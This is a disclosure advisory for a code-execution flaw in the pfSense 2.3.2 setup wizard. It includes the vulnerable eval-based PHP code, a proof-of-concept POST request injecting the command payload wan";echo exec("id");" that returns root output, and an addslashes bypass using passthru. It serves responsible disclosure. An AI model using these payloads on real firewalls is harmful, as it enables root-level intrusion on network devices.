pfsense 2.3.2 Code Execution Vulnerability

### **Overview** pfsense is an open source firewall. The web interface is written in PHP. In version 2.3.2-RELEASE (amd64), the setup wizard is vulnerable to code execution. It should be noted that by default, only an administrator can access the setup wizard. By default, administrators have far-reaching permissions via the wizard and via other functionality. There are however some custom configurations where this vulnerability could lead to privilege escalation or undesired code execution. Unknown to us, this issue was previously discussed on the [github page of opnsense](https://github.com/opnsense/core/issues/1359) - a fork of pfsense - , although it was not classified as a vulnerability. ### **Details** CVSS: Medium; 6.8 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H When updating a config field, user input is passed to eval. For most config types the input is sanitized. However, the sanitation can be bypassed and there is no sanitation for the config type interfaces_selection. Both of these issues can lead to code execution. An attacker needs an account with the privilege to use the wizard ("WebCfg - pfSense wizard subsystem page"). The attack still works even if the privilege "User - Config - Deny Config Write" is set, which would normally prevent the user from performing changes on the server or from resetting the admin password. To reproduce the issue, visit https://192.168.10.150/wizard.php?xml=openvpn_wizard.xml, follow the instructions, and at the step that the parameter "interface" is used, use wan";echo exec("id");" as value. Note also that the addslashes filter for types other than interfaces_selection can be bypassed via `${passthru($_GET[x])}`. Proof of Concept: ``` POST /wizard.php HTTP/1.1 Host: 192.168.10.150 Content-Length: 506 __csrf_magic=sid%3A57913ee89f117b1d40fec5c590fe10d401717053%2C1450275812&xml=openvpn_wizard.xml&stepid=9&interface=wan";echo exec("id");"&protocol=TCP&localport=1194&description=fyjfyfyj&tlsauthentication=on&generatetlskey=on&dhparameters=2048&crypto=AES-256-CBC&digest=SHA1&engine=none&tunnelnet=&localnet=&concurrentcon=&compression=&dynip=on&addrpool=on&defaultdomain=&dnsserver1=&dnserver2=&dnserver3=&dnserver4=&ntpserver1=&ntpserver2=&nbttype=0&nbtscope=&winsserver1=&winsserver2=&advanced=&next=Next -> uid=0(root) gid=0(wheel) groups=0(wheel) ``` Code: ``` /wizard.php function update_config_field($field, $updatetext, $unset, $arraynum, $field_type) { [...] if($field_type == "interfaces_selection") { $var = "\$config{$field_conv}"; $text = "if (isset({$var})) unset({$var});"; $text .= "\$config" . $field_conv . " = \"" . $updatetext . "\";"; eval($text); return; } [..] $text = "\$config" . $field_conv . " = \"" . addslashes($updatetext) . "\";"; eval($text); } ``` ### **Solution** To mitigate this issue please upgrade at least to version 2.3.3: https://pfsense.org/download/ Please note that a newer version might already be available. ### **Report Timeline** | 02/06/2017 | Informed Vendor about Issue | | 02/07/2017 | Vendor confirms + fixes issues in git | | 02/20/2017 | Vendor relases fix + [vendor advisory](https://pfsense.org/security/advisories/pfSense-SA-17_02.webgui.asc) | | 03/24/2017 | Disclosed to public |